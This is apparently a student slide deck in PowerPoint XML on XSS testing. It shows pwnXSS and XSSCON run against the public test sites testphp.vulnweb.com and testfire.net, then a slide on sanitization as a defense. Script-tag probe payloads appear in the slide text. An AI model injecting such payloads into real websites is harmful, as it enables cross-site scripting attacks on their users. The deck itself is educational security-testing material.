          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5459"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="FFCC59"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>XSS DEFEND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9907514" y="7329540"/>
            <a:ext cx="7730853" cy="530861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4339"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3099">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Here no plain text will be stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="353630" y="8843871"/>
            <a:ext cx="17842632" cy="9766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Here we didn't written anything as a plain text, and moreover the '&lt;img /&gt;'  is a HTML malicious code, but sanitization and input validation removes malacious code and returns only null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1" r="0" b="331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="709229"/>
            <a:ext cx="14119481" cy="1215740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11038633" cy="950467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11038633" cy="950467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="950467" w="11038633">
                  <a:moveTo>
                    <a:pt x="10914173" y="950467"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="950467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="950467"/>
                    <a:pt x="0" y="894587"/>
                    <a:pt x="0" y="826007"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10914173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10982753" y="0"/>
                    <a:pt x="11038633" y="55880"/>
                    <a:pt x="11038633" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11038633" y="826007"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11038633" y="894587"/>
                    <a:pt x="10982753" y="950467"/>
                    <a:pt x="10914173" y="950467"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="554641" y="2315560"/>
            <a:ext cx="17136630" cy="7359724"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11859487" cy="5093332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11859488" cy="5093333"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5093333" w="11859488">
                  <a:moveTo>
                    <a:pt x="11735027" y="5093333"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="5093333"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="5093333"/>
                    <a:pt x="0" y="5037452"/>
                    <a:pt x="0" y="4968872"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11735027" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11803607" y="0"/>
                    <a:pt x="11859488" y="55880"/>
                    <a:pt x="11859488" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11859488" y="4968872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11859488" y="5037453"/>
                    <a:pt x="11803607" y="5093333"/>
                    <a:pt x="11735027" y="5093333"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 7" id="7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="709476" y="3192568"/>
            <a:ext cx="11395459" cy="6239697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="554641" y="2315560"/>
            <a:ext cx="5389257" cy="711083"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7185676" cy="948111"/>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1119015" cy="948111"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="1311567" y="26834"/>
              <a:ext cx="5874108" cy="921277"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="5831"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4165">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>PWN XSS</a:t>
              </a:r>
            </a:p>
          </p:txBody>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5373" y="6667002"/>
            <a:ext cx="4499949" cy="691867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="925804"/>
            <a:ext cx="13961731" cy="779781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6369"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4549">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Tools used for Vulnerability check of a website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12327421" y="3328925"/>
            <a:ext cx="5363850" cy="5900309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4308"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3077">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Here we have used pwnXSS for vulnerability check for a website "http://testphp.vulnweb.com" , then after running pwnxss in kali linux, it has shown critical warning in search bar of website with xss malicious code: &lt;script&gt;alert(6000/3000)&lt;/script&gt;, Lets Check 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="8723794"/>
            <a:ext cx="17687575" cy="1563206"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13563484" cy="1198724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13563484" cy="1198724"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1198724" w="13563484">
                  <a:moveTo>
                    <a:pt x="13439023" y="1198724"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="1198724"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="1198724"/>
                    <a:pt x="0" y="1142844"/>
                    <a:pt x="0" y="1074264"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13439023" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13507603" y="0"/>
                    <a:pt x="13563484" y="55880"/>
                    <a:pt x="13563484" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13563484" y="1074264"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13563484" y="1142844"/>
                    <a:pt x="13507603" y="1198724"/>
                    <a:pt x="13439023" y="1198724"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="279035"/>
            <a:ext cx="14119481" cy="1215740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11038633" cy="950467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11038633" cy="950467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="950467" w="11038633">
                  <a:moveTo>
                    <a:pt x="10914173" y="950467"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="950467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="950467"/>
                    <a:pt x="0" y="894587"/>
                    <a:pt x="0" y="826007"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10914173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10982753" y="0"/>
                    <a:pt x="11038633" y="55880"/>
                    <a:pt x="11038633" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11038633" y="826007"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11038633" y="894587"/>
                    <a:pt x="10982753" y="950467"/>
                    <a:pt x="10914173" y="950467"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 7" id="7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="5280" r="0" b="7515"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="353630" y="1761475"/>
            <a:ext cx="7389817" cy="651008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8041443" y="1884378"/>
            <a:ext cx="9934030" cy="6387182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="391730" y="8786494"/>
            <a:ext cx="17842632" cy="14719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After running &lt;script&gt;alert(6000/3000)&lt;/script&gt; , this script in search bar it has given 2 answer in alert box, that means here xss attack is happening, that we have identified with pwnxss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="495610"/>
            <a:ext cx="13961731" cy="779781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6369"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4549">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Tools used for Vulnerability check of a website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1" r="0" b="331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="709229"/>
            <a:ext cx="14119481" cy="1215740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11038633" cy="950467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11038633" cy="950467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="950467" w="11038633">
                  <a:moveTo>
                    <a:pt x="10914173" y="950467"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="950467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="950467"/>
                    <a:pt x="0" y="894587"/>
                    <a:pt x="0" y="826007"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10914173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10982753" y="0"/>
                    <a:pt x="11038633" y="55880"/>
                    <a:pt x="11038633" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11038633" y="826007"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11038633" y="894587"/>
                    <a:pt x="10982753" y="950467"/>
                    <a:pt x="10914173" y="950467"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="554641" y="2315560"/>
            <a:ext cx="17136630" cy="7359724"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11859487" cy="5093332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11859488" cy="5093333"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5093333" w="11859488">
                  <a:moveTo>
                    <a:pt x="11735027" y="5093333"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="5093333"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="5093333"/>
                    <a:pt x="0" y="5037452"/>
                    <a:pt x="0" y="4968872"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11735027" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11803607" y="0"/>
                    <a:pt x="11859488" y="55880"/>
                    <a:pt x="11859488" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11859488" y="4968872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11859488" y="5037453"/>
                    <a:pt x="11803607" y="5093333"/>
                    <a:pt x="11735027" y="5093333"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="554641" y="2315560"/>
            <a:ext cx="5389257" cy="711083"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7185676" cy="948111"/>
          </a:xfrm>
        </p:grpSpPr>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119015" cy="948111"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="1311567" y="26834"/>
              <a:ext cx="5874108" cy="921277"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="5831"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4165">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>XSS CON</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 10" id="10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="554641" y="3026643"/>
            <a:ext cx="10158273" cy="4696591"/>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554641" y="6455461"/>
            <a:ext cx="10158273" cy="3161941"/>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43949" y="7377300"/>
            <a:ext cx="4499949" cy="691867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1665373" y="925804"/>
            <a:ext cx="13961731" cy="779781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6369"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4549">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Tools used for Vulnerability check of a website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10944586" y="3328925"/>
            <a:ext cx="6540292" cy="5362872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4308"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3077">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Here we have used XSSCON for vulnerability check for a website "http://testfire.net" , then after running xsscon in kali linux, it has shown critical warning in search bar of website with xss malicious code: &lt;script&gt;console.log(5000/3000)&lt;/script&gt;, Lets Check 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="8723794"/>
            <a:ext cx="17946463" cy="1251034"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13762008" cy="959339"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13762008" cy="959339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="959339" w="13762008">
                  <a:moveTo>
                    <a:pt x="13637549" y="959339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="959339"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="959339"/>
                    <a:pt x="0" y="903459"/>
                    <a:pt x="0" y="834879"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
